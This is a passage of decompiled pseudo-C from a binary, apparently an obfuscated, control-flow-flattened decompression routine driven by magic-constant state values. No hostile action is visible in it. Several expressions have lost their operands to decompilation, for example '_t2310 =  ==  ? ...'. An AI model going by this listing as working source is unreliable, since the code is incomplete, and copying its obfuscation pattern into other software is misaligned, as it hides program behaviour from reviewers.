													 *(_t2397 + 0x11c) =  !(_t2365 |  !(( *( *(_t2397 + 0x324)) & 0x000000ff) <<  *(_t2397 + 0x328))) | (( *( *(_t2397 + 0x324)) & 0x000000ff) <<  *(_t2397 + 0x328) & 0xb19cee6e |  !(( *( *(_t2397 + 0x324)) & 0x000000ff) <<  *(_t2397 + 0x328)) & 0x4e631191) ^ (_t1954 & 0xb19cee6e | _t2365 & 0x4e631191);
													 *((intOrPtr*)(_t2397 + 0xd8)) = 0;
													 *(_t2397 + 0xe4) =  *(_t2397 + 0x328) + 8;
													if(0x41933f86 > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 != 0x66f9dad7) {
														goto L4;
													} else {
														_t2310 = 0xb0d3e7d4;
														 *(_t2397 + 0x168) = (( *(_t2397 + 0x2ac) & 0xcb3195d4 |  !( *(_t2397 + 0x2ac)) & 0x34ce6a2b) ^ 0xcb3195d4) +  *(_t2397 + 0x2a8);
														if(0xb0d3e7d4 > 0xff0faca1) {
															continue;
														}
													}
												}
											} else {
												if(_t2310 == 0x64bbdec4) {
													_t2334 = 0xde607069;
													_t1510 = 0xb2c900e0;
													goto L440;
												} else {
													if(_t2310 != 0x65883e44) {
														goto L4;
													} else {
														 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x2d0);
														 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x2cc);
														 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x2c4);
														_t2228 =  *_t2397;
														 *((intOrPtr*)(_t2228 + 8)) =  *((intOrPtr*)(_t2228 + 8)) +  *(_t2397 + 0x2c8) -  *( *(_t2397 + 0x3a4));
														 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x2c8);
														 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x374);
														_push( *((intOrPtr*)(_t2397 + 0x298)));
														goto L419;
													}
												}
											}
										} else {
											if(_t2310 <= 0x686f14ee) {
												if(_t2310 == 0x67273831) {
													_t2310 = 0x112d89bb;
													 *(_t2397 + 0x144) =  *((intOrPtr*)(_t2397 + 0x258)) -  *(_t2397 + 0x260);
													if(0x112d89bb > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 != 0x682275b2) {
														goto L4;
													} else {
														_t2310 = 0x9c2ce5c3;
														 *(_t2397 + 0x74) =  *(_t2397 + 0x180);
														 *(_t2397 + 0x7c) =  *(_t2397 + 0x188);
														 *(_t2397 + 0x6c) =  *(_t2397 + 0x190);
														 *(_t2397 + 0x70) =  *(_t2397 + 0x198);
														 *((intOrPtr*)(_t2397 + 0x5c)) =  *((intOrPtr*)(_t2397 + 0x3a8));
														 *(_t2397 + 0x78) =  *(_t2397 + 0x1a0);
														 *(_t2397 + 0x60) =  *(_t2397 + 0xec);
														if(0x9c2ce5c3 > 0xff0faca1) {
															continue;
														}
													}
												}
											} else {
												if(_t2310 == 0x686f14ef) {
													_t2371 = 0xa3ef3801;
													_t1405 = 0xf68b329c;
													goto L374;
												} else {
													if(_t2310 == 0x68d0b7ad) {
														_t2326 = 0x6b833ab9;
														_t2024 = 0xefc4acb6;
														goto L344;
													} else {
														if(_t2310 != 0x6acf41f2) {
															goto L4;
														} else {
															_t2312 = 0x6beb70be;
															 *(_t2397 + 0x1e0) =  *(_t2397 + 0x1d4);
															 *(_t2397 + 0x1e4) =  *( *(_t2397 + 0x1e0)) + ( !( *(0x97c048 +  *(_t2397 + 0x1dc) * 4) ^  *(_t2397 + 0x2f0)) &  *(_t2397 + 0x2f0)) * 8;
															_t1533 =  *(_t2397 + 0x1e4);
															_t2074 = _t1533[1] & 0x000000ff;
															 *(_t2397 + 0x1e8) =  *(_t2397 + 0x2f0) >> _t2074;
															 *(_t2397 + 0x1ec) =  *(_t2397 + 0x2ec) - _t2074;
															 *(_t2397 + 0x1f0) =  *_t1533 & 0x000000ff;
															_t1535 = 0xe77cb74d;
															goto L381;
														}
													}
												}
											}
										}
									} else {
										if(_t2310 > 0x772181bd) {
											if(_t2310 <= 0x7a5b4e38) {
												if(_t2310 == 0x772181be) {
													_t2310 = 0x62db2d11;
													 *(_t2397 + 0x148) =  !( *(_t2397 + 0x268)) +  *(_t2397 + 0x26c);
													if(0x62db2d11 > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 != 0x782dbbf8) {
														goto L4;
													} else {
														_t2335 = 0x2944d097;
														 *(_t2397 + 0x274) =  *( *(_t2397 + 0x1a4));
														 *(_t2397 + 0x278) =  *( *(_t2397 + 0x244));
														_t1372 = 0xfb56c3f7;
														goto L177;
													}
												}
											} else {
												if(_t2310 == 0x7a5b4e39) {
													_t2310 = 0xfa4e60ee;
													 *( *(_t2397 + 0x1ac)) = 8;
													 *(_t2397 + 0x178) =  *(_t2397 + 0x2b4);
													 *(_t2397 + 0x174) =  *(_t2397 + 0x380);
													 *(_t2397 + 0x16c) =  *(_t2397 + 0x37c);
													 *(_t2397 + 0x164) =  *(_t2397 + 0x378);
													if(0xfa4e60ee > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 == 0x7d154f5a) {
														_t2322 = 0x32e30fa6;
														_t2372 = 0xf35140c3;
														_t2233 = 0x32e30fa6;
														 *(_t2397 + 0x348) =  *(_t2397 + 0x130);
														goto L199;
													} else {
														if(_t2310 != 0x7d542e43) {
															goto L4;
														} else {
															_t2078 =  *(_t2397 + 0x38);
															 *(_t2397 + 0x36c) =  *(_t2397 + 0x50);
															_t2310 =  ==  ? 0x5c17ef16 : 0x22aac5b7;
															_t1550 =  *(_t2397 + 0x36c);
															goto L303;
														}
													}
												}
											}
										} else {
											if(_t2310 <= 0x6beb70bd) {
												if(_t2310 == 0x6b222ac4) {
													_t2310 = 0xefb4f658;
													 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x32c);
													 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x328);
													 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x320);
													_t2219 =  *_t2397;
													_t2219[2] =  &(_t2219[2][ *(_t2397 + 0x324) -  *( *(_t2397 + 0x3a4))]);
													 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x324);
													 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2c0);
													_push( *((intOrPtr*)(_t2397 + 0x330)));
													goto L3;
												} else {
													if(_t2310 != 0x6b833ab9) {
														goto L4;
													} else {
														_t2326 = 0x9810a81a;
														_t2024 = 0x249a7038;
														goto L344;
													}
												}
											} else {
												if(_t2310 == 0x6beb70be) {
													_t2326 = 0x4dfbdc2c;
													_t2024 = 0x68d0b7ad;
													goto L344;
												} else {
													if(_t2310 == 0x70443c83) {
														_t2310 = 0x7d542e43;
														 *(_t2397 + 0x50) =  *(_t2397 + 0x294);
														 *(_t2397 + 0x38) =  *(_t2397 + 0x154);
														if(0x7d542e43 > 0xff0faca1) {
															continue;
														}
													} else {
														if(_t2310 != 0x73613943) {
															goto L4;
														} else {
															_t2310 = 0x62a18ca4;
															 *(_t2397 + 0x2dc) =  *(_t2397 + 0x9c);
															 *(_t2397 + 0x2e0) =  *(_t2397 + 0x98);
															 *(_t2397 + 0x1d0) =  *(_t2397 + 0x17c) + 8;
															 *(_t2397 + 0x1d4) =  *(_t2397 + 0x1d0);
															 *(_t2397 + 0x1d8) =  &(( *(_t2397 + 0x1d4))[1]);
															 *(_t2397 + 0xa8) =  *(_t2397 + 0x94);
															 *(_t2397 + 0xa0) =  *(_t2397 + 0x90);
															 *(_t2397 + 0x68) =  *(_t2397 + 0x8c);
															 *(_t2397 + 0x1dc) =  *( *(_t2397 + 0x1d8));
															 *(_t2397 + 0x80) =  *(_t2397 + 0x88);
															 *((intOrPtr*)(_t2397 + 0x64)) =  *((intOrPtr*)(_t2397 + 0x84));
															if(0x62a18ca4 > 0xff0faca1) {
																continue;
															}
														}
													}
												}
											}
										}
									}
								} else {
									if(_t2310 <= 0x58c502a9) {
										if(_t2310 <= 0x4dfbdc2b) {
											if(_t2310 > 0x4ac5dc85) {
												if(_t2310 == 0x4ac5dc86) {
													_t2310 = 0xdcf1a834;
													 *(_t2397 + 0xb8) =  *(_t2397 + 0x30c) - 1;
													 *(_t2397 + 0xb4) =  &(( *(_t2397 + 0x310))[1]);
													 *(_t2397 + 0xb0) = ( *( *(_t2397 + 0x310)) & 0x000000ff) <<  *(_t2397 + 0x314) ^  *(_t2397 + 0x318) |  *(_t2397 + 0x318) & ( *( *(_t2397 + 0x310)) & 0x000000ff) <<  *(_t2397 + 0x314);
													 *((intOrPtr*)(_t2397 + 0xa4)) = 0;
													 *(_t2397 + 0xac) =  *(_t2397 + 0x314) + 8;
													if(0xdcf1a834 > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 != 0x4d1443d0) {
														goto L4;
													} else {
														 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x2d0);
														 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x2cc);
														 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x2c4);
														_t2228 =  *_t2397;
														 *((intOrPtr*)(_t2228 + 8)) =  *((intOrPtr*)(_t2228 + 8)) +  *(_t2397 + 0x2c8) -  *( *(_t2397 + 0x3a4));
														 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x2c8);
														 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2c0);
														_push(0xfffffffe);
														goto L419;
													}
												}
											} else {
												if(_t2310 == 0x45501602) {
													_t2310 =  !=  ? 0x972443c8 : 0x3cd1f30c;
													 *((intOrPtr*)(_t2397 + 0x138)) =  *((intOrPtr*)(_t2397 + 0x344));
													 *(_t2397 + 0x140) =  *(_t2397 + 0x2c0);
													 *(_t2397 + 0x13c) =  *(_t2397 + 0x2bc);
													_t1400 =  *(_t2397 + 0x348);
													L188:
													 *(_t2397 + 0x134) = _t1400;
													if(_t2310 > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 != 0x48a60501) {
														goto L4;
													} else {
														_t2371 = 0xe6a0b78c;
														_t1405 = 0x19984b7b;
														goto L374;
													}
												}
											}
										} else {
											if(_t2310 <= 0x558898c1) {
												if(_t2310 == 0x4dfbdc2c) {
													_t2322 = 0x871eb044;
													_t2372 = 0x977d26a;
													_t2233 = 0x871eb044;
													L199:
													goto L200;
												} else {
													if(_t2310 != 0x4e2f5837) {
														goto L4;
													} else {
														 *(_t2397 + 0x290) =  *( *(_t2397 + 0x1a4));
														 *(_t2397 + 0x294) =  *( *(_t2397 + 0x58));
														_t2310 =  ==  ? 0x7d542e43 : 0x9a116709;
														goto L356;
													}
												}
											} else {
												if(_t2310 == 0x558898c2) {
													_t2310 = 0xd19278a9;
													 *(_t2397 + 0x15c) = (( *(_t2397 + 0x29c) & 0x3b2a9a2f |  !( *(_t2397 + 0x29c)) & 0xc4d565d0) ^ 0x3b2a9a2f) +  *(_t2397 + 0x2a0);
													if(0xd19278a9 > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 == 0x5750738b) {
														_t2322 = 0x5b59e17b;
														_t2372 = 0x85d6fbbf;
														 *(_t2397 + 0x220) =  *(_t2397 + 0x210);
														 *(_t2397 + 0x224) =  *( *(_t2397 + 0x220)) + ( !( *(0x97c048 +  *(_t2397 + 0x218) * 4) ^  *(_t2397 + 0x318)) &  *(_t2397 + 0x318)) * 8;
														_t1424 =  *(_t2397 + 0x224);
														_t2052 = _t1424[1] & 0x000000ff;
														 *(_t2397 + 0x228) =  *(_t2397 + 0x318) >> _t2052;
														 *(_t2397 + 0x22c) =  *(_t2397 + 0x314) - _t2052;
														_t2233 = 0x5b59e17b;
														 *(_t2397 + 0x230) =  *_t1424 & 0x000000ff;
														 *((char*)(_t2397 + 0x237)) = ( !( *(_t2397 + 0x230)) | 0xffffffef) != 0xffffffff;
														L169:
														L200:
														_t2323 =  ==  ? _t2372 : _t2322;
														_t2324 =  >=  ? _t2233 :  ==  ? _t2372 : _t2322;
														_t2310 =  !=  ? _t2372 :  >=  ? _t2233 :  ==  ? _t2372 : _t2322;
														if(_t2310 > 0xff0faca1) {
															continue;
														}
													} else {
														if(_t2310 != 0x576e88dc) {
															goto L4;
														} else {
															_t2310 = 0x4d1443d0;
															if(0x4d1443d0 > 0xff0faca1) {
																continue;
															}
														}
													}
												}
											}
										}
									} else {
										if(_t2310 > 0x62a18ca3) {
											if(_t2310 <= 0x62db2d10) {
												if(_t2310 == 0x62a18ca4) {
													_t2311 = 0x6acf41f2;
													 *(_t2397 + 0x2e4) =  *(_t2397 + 0xa8);
													 *(_t2397 + 0x2e8) =  *(_t2397 + 0xa0);
													 *(_t2397 + 0x2ec) =  *(_t2397 + 0x68);
													 *(_t2397 + 0x2f0) =  *(_t2397 + 0x80);
													 *((intOrPtr*)(_t2397 + 0x2f4)) =  *((intOrPtr*)(_t2397 + 0x64));
													_t1983 = 0xe0806a53;
													goto L464;
												} else {
													if(_t2310 != 0x62b1c5ad) {
														goto L4;
													} else {
														_t2339 = 0x15d350fd;
														_t2002 = 0x3c0a8c12;
														goto L431;
													}
												}
											} else {
												if(_t2310 == 0x62db2d11) {
													_t2335 = 0xfb56c3f7;
													 *(_t2397 + 0x360) =  *(_t2397 + 0x148);
													 *((intOrPtr*)(_t2397 + 0x270)) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x254))));
													_t1372 = 0x782dbbf8;
													L177:
													_t2310 =  ==  ? _t1372 : _t2335;
													 *(_t2397 + 0x44) =  *(_t2397 + 0x268);
													 *(_t2397 + 0x30) =  *(_t2397 + 0x360);
													if(_t2310 > 0xff0faca1) {
														continue;
													}
												} else {
													if(_t2310 == 0x63279930) {
														 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x2d0);
														 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x2cc);
														 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x2c4);
														_t2228 =  *_t2397;
														 *((intOrPtr*)(_t2228 + 8)) =  *((intOrPtr*)(_t2228 + 8)) +  *(_t2397 + 0x2c8) -  *( *(_t2397 + 0x3a4));
														 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x2c8);
														 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2c0);
														_push(0xfffffffd);
														goto L419;
													} else {
														if(_t2310 != 0x64909a6e) {
															goto L4;
														} else {
															_t2340 = 0xdc237c9;
															 *(_t2397 + 0x2a8) =  *( *(_t2397 + 0x1a4));
															 *(_t2397 + 0x2ac) =  *( *(_t2397 + 0x58));
															_t1387 = 0x824a9e89;
															goto L451;
														}
													}
												}
											}
										} else {
											if(_t2310 <= 0x5c17ef15) {
												if(_t2310 == 0x58c502aa) {
													_t2342 =  >  ? 0x17792f21 : 0x930c257d;
													_t2310 =  !=  ? 0x930c257d :  >  ? 0x17792f21 : 0x930c257d;
													 *((intOrPtr*)(_t2397 + 0xd4)) =  *((intOrPtr*)(_t2397 + 0x2d4));
													 *(_t2397 + 0xc8) =  *(_t2397 + 0x2d0);
													 *(_t2397 + 0xc4) =  *(_t2397 + 0x2cc);
													 *(_t2397 + 0xd0) =  *(_t2397 + 0x2c8);
													 *(_t2397 + 0xcc) =  *(_t2397 + 0x2c4);
													 *(_t2397 + 0xc0) =  *(_t2397 + 0x2c0);
													_t1333 =  *(_t2397 + 0x2bc);
													goto L377;
												} else {
													if(_t2310 != 0x5b59e17b) {
														goto L4;
													} else {
														_t2310 = 0x5750738b;
														if(0x5750738b > 0xff0faca1) {
															continue;
														}
													}
												}
											} else {
												if(_t2310 == 0x5c17ef16) {
													 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x36c);
													_t1335 = E00952F00(_t2392,  *((intOrPtr*)(_t2397 + 4)),  *((intOrPtr*)(_t2397 + 0x2d4)));
													_t2397 = _t2397 + 0xc;
													 *((intOrPtr*)(_t2397 + 0x298)) = _t1335;
													_t2316 = 0x3669a043;
													 *(_t2397 + 0x29c) =  *( *(_t2397 + 0x19c));
													 *(_t2397 + 0x2a0) =  *( *(_t2397 + 0x1a4));
													_t1341 = 0x558898c2;
													goto L414;
												} else {
													if(_t2310 == 0x5d6e6eab) {
														_t2310 = 0x29c2cc95;
														if(0x29c2cc95 > 0xff0faca1) {
															continue;
														}
													} else {
														if(_t2310 != 0x5f90ff14) {
															L4:
															if(_t2310 > 0xff0faca1) {
																continue;
															}
														} else {
															L290:
															_t2310 = 0xb6a88063;
															if(0xb6a88063 <= 0xff0faca1) {
																L221:
																while(_t2310 > 0xc1846e4e) {
																	if(_t2310 > 0xdbbcea20) {
																		if(_t2310 <= 0xe96fd8b2) {
																			if(_t2310 <= 0xe203130c) {
																				if(_t2310 > 0xde607068) {
																					if(_t2310 == 0xde607069) {
																						_t2310 = 0x3abef79d;
																						( *(_t2397 + 0x238))[1] = ( *(_t2397 + 0x238))[1] + ( !( *(0x97c048 +  *(_t2397 + 0x23c) * 4) ^  *(_t2397 + 0x32c)) &  *(_t2397 + 0x32c));
																						 *(_t2397 + 0x124) =  *(_t2397 + 0x32c) >>  *(_t2397 + 0x23c);
																						 *(_t2397 + 0x120) =  *(_t2397 + 0x328) -  *(_t2397 + 0x23c);
																						 *( *(_t2397 + 0x1ac)) = 5;
																						 *((intOrPtr*)(_t2397 + 0x118)) =  *((intOrPtr*)(_t2397 + 0x330));
																						 *(_t2397 + 0x10c) =  *(_t2397 + 0x324);
																						_t1288 =  *(_t2397 + 0x320);
																						goto L461;
																					} else {
																						if(_t2310 != 0xe0806a53) {
																							goto L4;
																						} else {
																							_t2312 = 0xaea34227;
																							_t1535 = 0xbf30f95;
																							L381:
																							_t2310 =  ==  ? _t1535 : _t2312;
																							if(_t2310 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																						}
																					}
																				} else {
																					if(_t2310 == 0xdbbcea21) {
																						_t2310 = 0xb0d3e7d4;
																						 *(_t2397 + 0x168) =  *((intOrPtr*)(_t2397 + 0x2a4)) -  *(_t2397 + 0x2ac);
																						if(0xb0d3e7d4 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					} else {
																						if(_t2310 != 0xdcf1a834) {
																							goto L4;
																						} else {
																							_t2311 = 0x27ccc48b;
																							 *(_t2397 + 0x30c) =  *(_t2397 + 0xb8);
																							 *(_t2397 + 0x310) =  *(_t2397 + 0xb4);
																							 *(_t2397 + 0x314) =  *(_t2397 + 0xac);
																							 *(_t2397 + 0x318) =  *(_t2397 + 0xb0);
																							 *((intOrPtr*)(_t2397 + 0x31c)) =  *((intOrPtr*)(_t2397 + 0xa4));
																							_t1983 = 0x686f14ef;
																							L464:
																							_t2310 =  <  ? _t1983 : _t2311;
																							if(_t2310 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																						}
																					}
																				}
																				goto L467;
																			} else {
																				if(_t2310 <= 0xe6a0b78b) {
																					if(_t2310 == 0xe203130d) {
																						_t2310 = 0x40d44373;
																						 *(_t2397 + 0x150) =  *( *(_t2397 + 0x244));
																						if(0x40d44373 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					} else {
																						if(_t2310 != 0xe4f9ab1b) {
																							goto L4;
																						} else {
																							_t2326 = 0x576e88dc;
																							_t2024 = 0x63279930;
																							L344:
																							_t2310 =  ==  ? _t2024 : _t2326;
																							if(_t2310 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																						}
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xe6a0b78c) {
																						_t1964 =  !=  ? 0xa23d06a9 : 0x19984b7b;
																						_t2352 =  ==  ? 0xa23d06a9 : 0x19984b7b;
																						_t2310 =  >=  ?  !=  ? 0xa23d06a9 : 0x19984b7b :  ==  ? 0xa23d06a9 : 0x19984b7b;
																						 *(_t2397 + 0x1fc) =  *(_t2397 + 0x2f8) - 1;
																						 *(_t2397 + 0x200) =  &(( *(_t2397 + 0x2fc))[1]);
																						_t1795 = ( *( *(_t2397 + 0x2fc)) & 0x000000ff) <<  *(_t2397 + 0x300);
																						_t1966 =  !_t1795;
																						_t1953 = _t1966 & 0x51ed49a1;
																						_t2392 =  *((intOrPtr*)(_t2397 + 0x3a0));
																						 *(_t2397 + 0x204) =  !( !( *(_t2397 + 0x304)) | _t1966) | (_t1795 & 0xae12b65e | _t1966 & 0x51ed49a1) ^ ( *(_t2397 + 0x304) & 0xae12b65e |  !( *(_t2397 + 0x304)) & 0x51ed49a1);
																						 *(_t2397 + 0x208) =  *(_t2397 + 0x300) + 8;
																						if(0x19984b7b <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																						goto L467;
																					} else {
																						if(_t2310 == 0xe77cb74d) {
																							 *( *(_t2397 + 0x1d0)) = ( *(_t2397 + 0x1e4))[4];
																							 *( *(_t2397 + 0x1ac)) = 6;
																							goto L403;
																						} else {
																							if(_t2310 != 0xe8203db1) {
																								goto L4;
																							} else {
																								_t2310 = 0x80894ce4;
																								_t739 = (0 |  *((intOrPtr*)(_t2397 + 0x1b4)) != 0x00000001) + 7; // 0x7
																								 *( *(_t2397 + 0x1ac)) = ( *((intOrPtr*)(_t2397 + 0x1b4)) != 1) + _t739;
																								 *(_t2397 + 0x18) =  *((intOrPtr*)(_t2397 + 0x1b4));
																								 *(_t2397 + 0x14) =  *(_t2397 + 0x1b8);
																								 *(_t2397 + 0xc) =  *(_t2397 + 0x1bc);
																								 *(_t2397 + 0x20) =  *(_t2397 + 0x1c0);
																								 *(_t2397 + 0x1c) =  *(_t2397 + 0x1c4);
																								 *(_t2397 + 0x10) =  *(_t2397 + 0x1c8);
																								_t1635 =  *(_t2397 + 0x2d8);
																								goto L437;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			if(_t2310 > 0xf43cee35) {
																				if(_t2310 <= 0xf6e6f1d7) {
																					if(_t2310 == 0xf43cee36) {
																						_t2310 = 0x62db2d11;
																						 *(_t2397 + 0x148) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x254)))) -  *(_t2397 + 0x268);
																						if(0x62db2d11 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					} else {
																						if(_t2310 != 0xf68b329c) {
																							goto L4;
																						} else {
																							_t2310 = 0xa3ef3801;
																							if(0xa3ef3801 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																						}
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xf6e6f1d8) {
																						_t2310 = 0x88692b27;
																						 *(_t2397 + 0x14c) =  !( *(_t2397 + 0x278)) +  *(_t2397 + 0x274);
																						if(0x88692b27 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																						goto L467;
																					} else {
																						if(_t2310 == 0xfa4e60ee) {
																							 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x2d0);
																							 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x174);
																							 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x164);
																							_t2382 =  *(_t2397 + 0x16c);
																							_t2228 =  *_t2397;
																							 *((intOrPtr*)(_t2228 + 8)) =  *((intOrPtr*)(_t2228 + 8)) + _t2382 -  *( *(_t2397 + 0x3a4));
																							 *( *(_t2397 + 0x3a4)) = _t2382;
																							 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x178);
																							_push(1);
																							L419:
																							_push(_t2228);
																							_push(_t2392);
																							_t1381 = E00952F00();
																							_t2397 = _t2397 + 0xc;
																							 *((intOrPtr*)(_t2397 + 4)) = _t1381;
																							_t2310 = 0xefb4f658;
																							if(0xefb4f658 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																							goto L467;
																						} else {
																							if(_t2310 != 0xfb56c3f7) {
																								goto L4;
																							} else {
																								_t2003 =  *(_t2397 + 0x30);
																								 *(_t2397 + 0x364) =  *(_t2397 + 0x44);
																								_t2310 =  ==  ? 0xcb49cfa : 0x3449edf6;
																								_t1498 =  *(_t2397 + 0x364);
																								goto L321;
																							}
																						}
																					}
																				}
																			} else {
																				if(_t2310 <= 0xefb4f657) {
																					if(_t2310 == 0xe96fd8b3) {
																						_t1826 =  *(_t2397 + 0x20c);
																						 *_t1826 = ( *(_t2397 + 0x230) ^ 0xfffffff0) &  *(_t2397 + 0x230);
																						_t1826[1] = ( *(_t2397 + 0x224))[4];
																						 *( *(_t2397 + 0x1ac)) = 4;
																						L436:
																						_t2310 = 0x80894ce4;
																						 *(_t2397 + 0x20) =  *(_t2397 + 0x228);
																						 *(_t2397 + 0x1c) =  *(_t2397 + 0x22c);
																						 *(_t2397 + 0x18) =  *((intOrPtr*)(_t2397 + 0x31c));
																						 *(_t2397 + 0x14) =  *(_t2397 + 0x310);
																						 *(_t2397 + 0xc) =  *(_t2397 + 0x30c);
																						 *(_t2397 + 0x10) =  *(_t2397 + 0x2c0);
																						_t1635 =  *(_t2397 + 0x2bc);
																						goto L437;
																					} else {
																						if(_t2310 != 0xef81ea3c) {
																							goto L4;
																						} else {
																							_t2310 = 0x9a85978c;
																							if(0x9a85978c <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																						}
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xefb4f658) {
																						_t1953 =  !=  ? 0x9a85978c : 0xef81ea3c;
																						_t2355 =  ==  ? 0x9a85978c : 0xef81ea3c;
																						_t2310 =  >=  ? 0xef81ea3c :  ==  ? 0x9a85978c : 0xef81ea3c;
																						 *((intOrPtr*)(_t2397 + 0x384)) =  *((intOrPtr*)(_t2397 + 4));
																						if(0xef81ea3c <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																						goto L467;
																					} else {
																						if(_t2310 == 0xefc4acb6) {
																							 *( *(_t2397 + 0x1d8)) =  *(_t2397 + 0x1f0);
																							 *( *(_t2397 + 0x1e0)) =  *(_t2397 + 0x1e4) + (( *(_t2397 + 0x1e4))[4] << 3);
																							L403:
																							_t2310 = 0x80894ce4;
																							 *(_t2397 + 0x20) =  *(_t2397 + 0x1e8);
																							 *(_t2397 + 0x1c) =  *(_t2397 + 0x1ec);
																							 *(_t2397 + 0x18) =  *((intOrPtr*)(_t2397 + 0x2f4));
																							 *(_t2397 + 0x14) =  *(_t2397 + 0x2e8);
																							 *(_t2397 + 0xc) =  *(_t2397 + 0x2e4);
																							 *(_t2397 + 0x10) =  *(_t2397 + 0x2e0);
																							_t1635 =  *(_t2397 + 0x2dc);
																							L437:
																							 *(_t2397 + 8) = _t1635;
																							if(_t2310 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																							goto L467;
																						} else {
																							if(_t2310 != 0xf35140c3) {
																								goto L4;
																							} else {
																								_t2317 = 0x32e30fa6;
																								_t2262 = 0x45501602;
																								_t2374 = 0x32e30fa6;
																								 *(_t2397 + 0x244) =  *(_t2397 + 0x58);
																								 *(_t2397 + 0x248) =  *( *(_t2397 + 0x244));
																								 *((char*)(_t2397 + 0x24f)) =  *(_t2397 + 0x348) -  *(_t2397 + 0x248) > 0;
																								L391:
																								_t2318 =  ==  ? _t2262 : _t2317;
																								_t2319 =  >=  ? _t2374 :  ==  ? _t2262 : _t2317;
																								_t2310 =  !=  ? _t2262 :  >=  ? _t2374 :  ==  ? _t2262 : _t2317;
																								if(_t2310 <= 0xff0faca1) {
																									continue;
																								} else {
																									goto L5;
																								}
																								goto L467;
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L297;
																	} else {
																		if(_t2310 <= 0xccf30b46) {
																			if(_t2310 <= 0xc663d9a6) {
																				if(_t2310 > 0xc3f77702) {
																					if(_t2310 == 0xc3f77703) {
																						_t2310 =  <  ? 0x3abef79d : 0xc79dc334;
																						 *((intOrPtr*)(_t2397 + 0x118)) =  *((intOrPtr*)(_t2397 + 0x2d4));
																						 *(_t2397 + 0x124) =  *(_t2397 + 0x2d0);
																						 *(_t2397 + 0x120) =  *(_t2397 + 0x2cc);
																						 *(_t2397 + 0x10c) =  *(_t2397 + 0x2c8);
																						_t1288 =  *(_t2397 + 0x2c4);
																						L461:
																						 *(_t2397 + 0x104) = _t1288;
																						if(_t2310 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					} else {
																						if(_t2310 != 0xc6137f0a) {
																							goto L4;
																						} else {
																							_t2310 = 0xefb4f658;
																							 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x304);
																							 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x300);
																							 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x2f8);
																							_t2219 =  *_t2397;
																							_t2219[2] =  &(_t2219[2][ *(_t2397 + 0x2fc) -  *( *(_t2397 + 0x3a4))]);
																							 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x2fc);
																							 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2c0);
																							_push( *((intOrPtr*)(_t2397 + 0x308)));
																							goto L3;
																						}
																						goto L466;
																					}
																				} else {
																					if(_t2310 == 0xc1846e4f) {
																						_t2357 = 0x2399f97f;
																						 *(_t2397 + 0x25c) =  *( *(_t2397 + 0x1a4));
																						 *(_t2397 + 0x260) =  *( *(_t2397 + 0x244));
																						_t1446 = 0xcd0c46d4;
																						goto L424;
																					} else {
																						if(_t2310 != 0xc2f6eac7) {
																							goto L4;
																						} else {
																							_t2310 = 0x682275b2;
																							 *(_t2397 + 0xec) =  !( *(_t2397 + 0x1a0)) +  *(_t2397 + 0x1a8);
																							if(0x682275b2 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																						}
																					}
																				}
																				goto L467;
																			} else {
																				if(_t2310 <= 0xc79dc333) {
																					if(_t2310 == 0xc663d9a7) {
																						_t2310 =  <=  ? 0x12555164 : 0x73613943;
																						 *((intOrPtr*)(_t2397 + 0x84)) =  *((intOrPtr*)(_t2397 + 0x2d4));
